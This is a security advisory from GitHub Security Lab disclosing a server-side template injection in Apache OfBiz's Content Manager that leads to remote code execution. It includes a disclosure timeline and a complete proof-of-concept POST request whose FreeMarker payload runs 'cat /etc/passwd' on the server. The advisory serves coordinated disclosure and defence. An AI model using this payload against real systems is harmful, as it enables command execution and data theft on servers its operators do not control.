January 26, 2021

GHSL-2020-070: Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE) in Apache OfBiz

Alvaro Muñoz

Coordinated Disclosure Timeline

  • 04/13/2020: Report sent to vendor.
  • 04/23/2020: OfBiz maintainer acknowledges the issue.
  • 04/23/2020: As per Apache policy, no CVE will be issued for post-authentication vulnerabilities no matter if they are privilege escalations or XSS issues (including this one that can be triggered via XSS reported in GHSL-2020-068)
  • 01/10/2021: Addressed in 17.12.05


Apache OfBiz is vulnerable to Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE)


Apache Ofbiz

Tested Version



Server-Side Template Injection through Content templates

A user with privileges to edit Content Manager templates, can use the UI or a direct POST request to get a FreeMarker template evaluated. For example, the example below will run the cat /etc/passwd command and will return its contents:

POST /content/control/createLayoutSubContent HTTP/1.1
Host: demo-stable.ofbiz.apache.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Connection: close
Cookie: JSESSIONID=9697AC85B262C213DEA0A548939118F6.jvm1;

contentTypeId=DOCUMENT&contentIdTo=TEMPLATE_MASTER&drDataResourceTypeId=ELECTRONIC_TEXT&drDataTemplateTypeId=FTL&textData=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}


This issue leads to Remote Code Execution


Not assigned


This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).


You can contact the GHSL team at securitylab@github.com, please include the GHSL-2020-070 in any communication regarding this issue.